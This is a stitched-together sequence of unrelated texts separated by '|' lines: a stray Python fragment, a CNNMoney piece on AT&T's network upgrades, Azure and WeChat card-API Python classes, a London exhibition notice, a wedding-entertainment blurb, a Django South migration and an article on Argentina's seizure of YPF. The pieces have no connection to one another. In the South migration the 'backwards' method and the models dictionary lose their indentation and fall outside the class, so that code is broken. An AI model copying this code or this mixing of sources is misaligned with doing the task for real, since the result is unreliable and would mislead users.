        """Return the size of *filename* in bytes."""
        st = stat(filename)
        return st.st_size
|
AT&T customers are seeing many more messages like this one, thanks to $20 billion spent on upgrades in the past year.
NEW YORK (CNNMoney) -- Dropped calls and spotty service, particularly for iPhone owners, made AT&T the most hated wireless carrier in America. Here's the surprise twist: widespread, under-the-radar improvements to the company's network have quietly helped AT&T move past its infamous struggles.
The nation's second-largest wireless carrier says it spent roughly $20 billion last year making 48,000 network enhancements across the country. That spending spree bought a 25% improvement in dropped-call performance on AT&T's 3G network, plus added capacity and faster speeds.
In the process, the company turned on two new networks. Though both were confusingly labeled "4G," they each offer significant improvements over AT&T's (T, Fortune 500) existing 3G network: one new network has speeds of up to four times faster than 3G, and the other brings a ten-fold improvement in speed.
Yet consumers have been slow to change their opinion of AT&T.
"Satisfaction with our network performance has gone into a neutral state," said John Stankey, CEO of AT&T Wireless, at a telecommunications conference held in San Francisco by Citigroup (C, Fortune 500) last week. "Our goal is to go from neutral to positive. We've made a lot of progress, but I don't want to suggest we're done."
A recent survey conducted by Consumer Reports ranked AT&T the worst carrier in America in terms of customer satisfaction. AT&T received the lowest possible rating on value and voice quality, and the second-lowest possible rating on data service.
That's not particularly surprising. AT&T's network woes have been very high-profile thanks to its four-year iPhone exclusivity deal with Apple (AAPL, Fortune 500). The wireless giant's struggles were blasted and mocked everywhere from the mainstream news media to late-night comedy shows.
AT&T's reputation wasn't helped by dismal satisfaction with the company's customer service, according to the Consumer Reports survey. AT&T also took a PR hit during its wildly unpopular T-Mobile takeover attempt.
Still, the mediocre perception of AT&T's network quality lags behind the much-improved reality, according to wireless industry experts.
Frost & Sullivan, an influential telecommunications industry analysis firm, awarded AT&T its 2011 strategy award for the North American mobile network market, praising the company for its dual-network improvement strategy.
AT&T is gradually rolling out its ultra-fast 4G Long Term Evolution (LTE) network, which will be the mobile network standard of the future. AT&T's LTE network now covers 74 million Americans, which is about a quarter of the company's 3G network coverage.
At the same time, AT&T is upgrading its 3G network -- which operates on the older High Speed Packet Access (HSPA) standard -- to what it calls "4G" HSPA+. The upgraded network is now available to more than 285 million Americans, AT&T Wireless CEO Stankey said last week.
Archrival Verizon (VZ, Fortune 500), by contrast, quickly rolled out its LTE network to cover 200 million Americans by the end of last year. But Verizon's 3G network is based on the Code Division Multiple Access (CDMA) standard, which is essentially maxed out in terms of speed. Sprint's (S, Fortune 500) 3G CDMA network also can't be upgraded significantly.
That's potentially a huge advantage for AT&T, since it will take several years for LTE networks to reach the vast majority of Americans the way that 3G networks do today.
"As 4G LTE networks are rolled out nationwide, AT&T's wireless network strategy will undoubtedly benefit its customers, who will have access to faster speeds, even when outside an LTE coverage area," said Peter Finalle, analyst at Frost & Sullivan.
What's more, Verizon's recent 4G struggles give AT&T an opportunity to flaunt its own rival strategy.
Though Verizon has been praised for rolling out its LTE network before any other wireless company even got started, its deployment speed was more out of necessity. It lacked the 3G upgrade option that AT&T has. Verizon is paying for that strategy now, suffering outage after outage: Verizon's 4G network totaled five nationwide outages in 2011 and four in December alone.
Will customers notice? They haven't yet. The alphabet soup -- 4G, LTE, HSPA and so on -- is confusing to most.
"AT&T advertises HSPA+ as '4G,' so the average consumer will likely not think of the carrier as not being current with latest technology," said Ari Zoldan, CEO of Quantum Networks, a next-generation network supplier. "Having HSPA+ in areas outside of LTE markets is very smart and serves a niche for the carrier, and it's still to be determined whether customers will put enough value on 'true' 4G."
AT&T's network is getting better, and it's better positioned for the long haul than any of its rivals. Now it just has to wait for perception to catch up to that reality.
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .control_activity import ControlActivity
class FilterActivity(ControlActivity):
    """Filter and return results from input array based on the conditions.

    NOTE: AutoRest-generated model (see the file header); manual changes
    other than comments will be lost when the code is regenerated.

    :param additional_properties: Unmatched properties from the message are
     deserialized this collection
    :type additional_properties: dict[str, object]
    :param name: Activity name.
    :type name: str
    :param description: Activity description.
    :type description: str
    :param depends_on: Activity depends on condition.
    :type depends_on: list[~azure.mgmt.datafactory.models.ActivityDependency]
    :param type: Constant filled by server.
    :type type: str
    :param items: Input array on which filter should be applied.
    :type items: ~azure.mgmt.datafactory.models.Expression
    :param condition: Condition to be used for filtering the input.
    :type condition: ~azure.mgmt.datafactory.models.Expression
    """
    # Client-side validation rules applied before the request is serialized.
    _validation = {
        'name': {'required': True},
        'type': {'required': True},
        'items': {'required': True},
        'condition': {'required': True},
    }
    # Maps Python attributes to wire-format keys; the filter-specific fields
    # are nested under the 'typeProperties' object in the JSON payload.
    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'name': {'key': 'name', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'depends_on': {'key': 'dependsOn', 'type': '[ActivityDependency]'},
        'type': {'key': 'type', 'type': 'str'},
        'items': {'key': 'typeProperties.items', 'type': 'Expression'},
        'condition': {'key': 'typeProperties.condition', 'type': 'Expression'},
    }
    def __init__(self, name, items, condition, additional_properties=None, description=None, depends_on=None):
        super(FilterActivity, self).__init__(additional_properties=additional_properties, name=name, description=description, depends_on=depends_on)
        self.items = items
        self.condition = condition
        # Polymorphic discriminator: fixed value identifying this activity type.
        self.type = 'Filter'
|
This month we are delighted to join forces with The Native Spirit Film Festival and the Bloomsbury festival in London. We will be exhibiting the breathtaking portraits of fine art photographer and social justice advocate Cara Romero at the Crypt Gallery. The exhibition ‘Life Blood‘, curated by Ash Kotak, explores activist art as realised by a group of international artists, film makers, writers and a poet.
‘Life Blood‘ opens on Thursday 18th 6.30-8.30 and ends on Sunday 21st October with a day of ‘Activism & Art‘ events. At 3pm I will be speaking about the work of Cara Romero, her evolution as an artist and her mission to shift perceptions of Indigenous people and cultures. Following my talk, there will be a candid discussion with a group of Native American women about the tragic situation of ‘Murdered and Missing Indigenous Women and Girls’ #MMIW.
If you are in London please come along to the Crypt Gallery between Thursday 18th and Sunday 21st October.
The Native Spirit Film Festival launches on Thursday October 11th and presents ten days of excellent International Indigenous films in venues across London.
|
# -*- coding: utf-8 -*-
from pywechat.services.basic import Basic
class CardService(Basic):
    """This class is an implement of the Wechat service of card.

    All request's urls come from the official documents.
    Link: https://mp.weixin.qq.com/wiki/home/index.html
    """
    def upload_image(self, image):
        """Uploads the image for the logo of card.
        Link:
        https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
        Args:
            image: the file of image. open(image_name, 'rb')
        Returns:
            the json data. Example:
            {"url":"http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkm/0"}
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        url = 'https://api.weixin.qq.com/cgi-bin/media/uploadimg'
        files = {'buffer': image}
        json_data = self._send_request('post', url, files=files)
        return json_data
    def get_colors(self):
        """Gets the available colors of cards.
        Link:
        https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
        Returns:
            the json data. Example (truncated):
            {
                "errcode": 0,
                "errmsg": "ok",
                "colors": [
                    {"name": "Color010", "value": "#55bd47"},
                    {"name": "Color020", "value": "#10ad61"},
                    ...
                ]
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        url = 'https://api.weixin.qq.com/card/getcolors'
        json_data = self._send_request('get', url)
        return json_data
    def create_card(
            self, card_dict, card_type, date_info,
            logo_url, code_type, brand_name, title,
            color, notice, description, quantity,
            **infos):
        """Creates a card.
        Link:
        https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
        Args:
            card_dict: extra fields specific to the card type (e.g.
                {"deal_detail": ...} for a GROUPON card), merged into the
                type-specific object of the payload.
            card_type: card type name, e.g. "groupon" (case-insensitive).
            date_info: validity period dict, e.g.
                {"type": 1, "begin_timestamp": ..., "end_timestamp": ...}.
            quantity: sku stock quantity.
            **infos: extra optional base_info fields (sub_title,
                service_phone, get_limit, ...).
        Returns:
            the json data as returned by the API.
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        base_info = {
            "logo_url": logo_url,
            "brand_name": brand_name,
            "title": title,
            "code_type": code_type,
            "color": color,
            "notice": notice,
            "description": description,
            "sku": {
                "quantity": quantity
            },
            "date_info": date_info
        }
        base_info.update(infos)
        # The API expects the type-specific object under the lower-cased
        # card type key while "card_type" itself is upper-cased.
        card_key = card_type.lower()
        data = {
            "card": {
                "card_type": card_type.upper(),
                card_key: {
                    "base_info": base_info
                }
            }
        }
        # BUG FIX: the original indexed data["card"][card_type] while the key
        # was stored lower-cased, raising KeyError whenever the caller passed
        # a card_type that was not already lower-case.
        data["card"][card_key].update(card_dict)
        url = 'https://api.weixin.qq.com/card/create'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def create_qrcode(self, code, **infos):
        """Creates a qr code.
        (Link:
        https://mp.weixin.qq.com/wiki/12/ccd3aa0bddfe5211aace864de00b42e0.html)
        Args:
            code: the card code to encode in the QR code.
            **infos: extra optional fields (card_id, openid, expire_seconds...).
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok",
                "ticket":"gQG28DoAAAAAAAAAASxodHRwOi8vd2VpeGluLnFxLmN=="
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        card_dict = {
            "code": code
        }
        card_dict.update(infos)
        data = {
            "action_name": "QR_CARD",
            "action_info": {
                # BUG FIX: the original wrote "card": { card_dict }, a set
                # literal containing a dict, which raises
                # TypeError: unhashable type: 'dict' at runtime; the API
                # expects the card object itself here.
                "card": card_dict
            }
        }
        url = 'https://api.weixin.qq.com/card/qrcode/create'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def unavailable_code(self, code, card_id=None):
        """Sets the code is unavailable (voids a card code).
        Link:
        https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
        Args:
            code: the card code to void.
            card_id: required only for cards using custom codes.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok",
                "card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
                "openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "code": code
        }
        if card_id:
            data["card_id"] = card_id
        url = 'https://api.weixin.qq.com/card/code/unavailable'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def decrypt_code(self, encrypt_code):
        """Decrypts the code.
        Link:
        https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
        Args:
            encrypt_code: the encrypted code obtained from a card event.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok",
                "card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
                "openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "encrypt_code": encrypt_code
        }
        # BUG FIX: the original posted to '/card/code/decrtpt'; the endpoint
        # documented by the WeChat card API is '/card/code/decrypt'.
        url = 'https://api.weixin.qq.com/card/code/decrypt'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def get_code(self, code, card_id=None):
        """Get the code.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            code: the card code to look up.
            card_id: required only for cards using custom codes.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok",
                "openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA",
                "card":{
                    "card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc",
                    "begin_time": 1404205036,
                    "end_time": 1404205036,
                }
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "code": code
        }
        if card_id:
            data["card_id"] = card_id
        url = 'https://api.weixin.qq.com/card/code/get'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def get_card(self, card_id):
        """Get the card.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            card_id: the id of the card to fetch.
        Returns:
            the json data: the full card object, e.g. (truncated)
            {
                "card": {
                    "card_type": "GROUPON",
                    "groupon": {
                        "base_info": {...},
                        "deal_detail": "..."
                    }
                }
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "card_id": card_id
        }
        url = 'https://api.weixin.qq.com/card/get'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def batchget_card(self, offset, count):
        """Get a list of cards.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            offset: pagination offset of the first card id to return.
            count: number of card ids to return.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok",
                "card_id_list":["ph_gmt7cUVrlRk8swPwx7aDyF-pg"],
                "total_num":1
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "offset": offset,
            "count": count
        }
        url = 'https://api.weixin.qq.com/card/batchget'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def update_card(
            self, card_id, card_type,
            logo_url, notice, description, color, detail=None,
            bonus_cleared=None, bonus_rules=None, balance_rules=None, prerogative=None,
            **infos):
        """Updates a card.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            card_id: the id of the card to update.
            card_type: card type name, e.g. "member_card" (case-insensitive).
            detail, bonus_cleared, bonus_rules, balance_rules, prerogative:
                optional member-card fields; omitted from the payload when
                not given.
            **infos: extra optional base_info fields.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok"
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        base_info = {
            "logo_url": logo_url,
            "notice": notice,
            "description": description,
            "color": color
        }
        if detail is not None:
            base_info["detail"] = detail
        base_info.update(infos)
        card_data = {
            "base_info": base_info
        }
        # Only send the optional fields that were actually supplied --
        # consistent with modify_stock()/unavailable_code(); the original
        # posted an explicit null for every omitted field.
        optional_fields = {
            "bonus_cleared": bonus_cleared,
            "bonus_rules": bonus_rules,
            "balance_rules": balance_rules,
            "prerogative": prerogative
        }
        for key, value in optional_fields.items():
            if value is not None:
                card_data[key] = value
        data = {
            "card_id": card_id,
            card_type.lower(): card_data
        }
        url = 'https://api.weixin.qq.com/card/update'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def modify_stock(
            self, card_id,
            increase_stock_value=None,
            reduce_stock_value=None):
        """Modifies the stock of a card.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            card_id: the id of the card whose stock is changed.
            increase_stock_value: amount to add to the stock, if any.
            reduce_stock_value: amount to remove from the stock, if any.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok"
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "card_id": card_id,
        }
        if increase_stock_value:
            data["increase_stock_value"] = increase_stock_value
        if reduce_stock_value:
            data["reduce_stock_value"] = reduce_stock_value
        url = 'https://api.weixin.qq.com/card/modifystock'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def update_code(self, code, new_code, card_id=None):
        """Updates the code.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            code: the current card code.
            new_code: the replacement code.
            card_id: required only for cards using custom codes.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok"
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "code": code,
            "new_code": new_code
        }
        if card_id:
            data["card_id"] = card_id
        url = 'https://api.weixin.qq.com/card/code/update'
        json_data = self._send_request('post', url, data=data)
        return json_data
    def delete_card(self, card_id):
        """Deletes the card.
        Link:
        https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
        Args:
            card_id: the id of the card to delete.
        Returns:
            the json data. Example:
            {
                "errcode":0,
                "errmsg":"ok"
            }
        Raises:
            WechatError: to raise the exception if it contains the error.
        """
        data = {
            "card_id": card_id
        }
        url = 'https://api.weixin.qq.com/card/delete'
        json_data = self._send_request('post', url, data=data)
        return json_data
|
Description We provide the perfect blend of the best event and wedding entertainment in Manchester and Cheshire that the industry has to offer.
With a mixture of incredible acts across a variety of genres and styles, this small but perfectly formed selection of event and wedding entertainment will make sure you need look no further, we’ve got you covered!
Get your wedding entertainment inspiration from Entertainment Nation! Entertainment Nation is the UK's most exciting wedding entertainment agency with a roster overflowing with the best wedding bands, musicians, DJs and entertainers.
|
from south.db import db
from django.db import models
from localtv.models import *
class Migration:
    def forwards(self, orm):
        """Forward migration: remove the legacy ``author`` model.

        The two many-to-many join tables are dropped first so that no
        references to the author table remain when it is itself deleted.
        """
        # Dropping ManyToManyField 'Feed.auto_authors'
        db.delete_table('localtv_feed_auto_authors')
        # Dropping ManyToManyField 'Video.authors'
        db.delete_table('localtv_video_authors')
        # Deleting model 'author'
        db.delete_table('localtv_author')
def backwards(self, orm):
# Adding ManyToManyField 'Feed.auto_authors'
db.create_table('localtv_feed_auto_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('feed', models.ForeignKey(orm.Feed, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding ManyToManyField 'Video.authors'
db.create_table('localtv_video_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('video', models.ForeignKey(orm.Video, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding model 'author'
db.create_table('localtv_author', (
('site', orm['localtv.author:site']),
('logo', orm['localtv.author:logo']),
('id', orm['localtv.author:id']),
('name', orm['localtv.author:name']),
))
db.send_create_signal('localtv', ['author'])
models = {
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.savedsearch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'when_created': ('django.db.models.fields.DateTimeField', [], {})
},
'localtv.video': {
'authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'embed_code': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']", 'null': 'True', 'blank': 'True'}),
'file_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'file_url_length': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'file_url_mimetype': ('django.db.models.fields.CharField', [], {'max_length': '60', 'blank': 'True'}),
'flash_enclosure_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_featured': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']", 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Tag']", 'blank': 'True'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video_service_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'video_service_user': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_approved': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997982)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997849)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'localtv.sitelocation': {
'about_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'admins_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'background': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'css': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'display_submit_button': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'footer_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'frontpage_style': ('django.db.models.fields.CharField', [], {'default': "'list'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'sidebar_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'submission_requires_login': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
'localtv.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'localtv.watch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Video']"})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.category': {
'Meta': {'unique_together': "(('slug', 'site'), ('name', 'site'))"},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'child_set'", 'blank': 'True', 'null': 'True', 'to': "orm['localtv.Category']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'localtv.author': {
'Meta': {'unique_together': "(('name', 'site'),)"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
},
'localtv.feed': {
'Meta': {'unique_together': "(('feed_url', 'site'),)"},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'auto_authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'etag': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'feed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'webpage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'localtv.openiduser': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'unique': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'localtv.profile': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['localtv']
|
Is Argentina Becoming the New Venezuela?
As the dust settles on Argentinean President Cristina Fernandez de Kirchner’s announcement that the state would seize control of assets owned by Repsol-backed energy company YPF, many are worried that other companies will shy away from investment in the South American country.
Argentine President Cristina Fernandez de Kirchner holds a plaque before delivering a speech during a ceremony to mark the 30th Anniversary of the 1982 South Atlantic war between Argentina and the Britain over the Falkland Islands (Malvinas).
Argentina is famously rich in natural resources, but has been handicapped in the past by political and economic turbulence. Many international investors had their fingers burnt by the 2001 Argentinean default, when the country defaulted on $120 billion of sovereign debt, with a recovery value of just 35 cents in the dollar.
The Argentineans are known for their fierce pride in their country, which is what Kirchner is counting on in order to maintain solid domestic support.
Her actions have been applauded by Hugo Chavez, the left-wing president of Venezuela, which recently nationalized its gold industry and has a longer history of seizing other foreign-owned assets, particularly in the oil industry.
The plans come after Argentina has become increasingly vocal about the retention of British power in the Falklands Islands – known as Las Malvinas in Argentina – and a focal point of nationalistic fervor. Argentina has already made life difficult for oil companies prospecting in the seas around the islands.
Kirchner’s opponents on the right wing of Argentina’s politics are less enamoured of the YPF idea, which will be debated in the Senate next week, but worried about speaking out internationally in case of a voter backlash.
Plenty of the biggest companies in Argentina, including banks and most of its telecommunications infrastructure, are owned by Spanish or Italian parent companies, a legacy of colonialism and the links between Argentina and its former European rulers. Already-troubled Spain has easily the biggest exposure to Argentina.
And most of the major international miners, including Rio Tinto and Xstrata , have operations in the resource-rich country.
Resource nationalism is known to be one of the biggest fears of mining companies in general, whether it’s countries that hike taxes, as in the case of Australia, or, in worst-case scenarios, nations that seize back their resources.
Argentina was already taxing oil exports heavily, while subsidising domestic consumption, which had sent the country’s oil balance into deficit in 2011 for the first time in more than two decades.
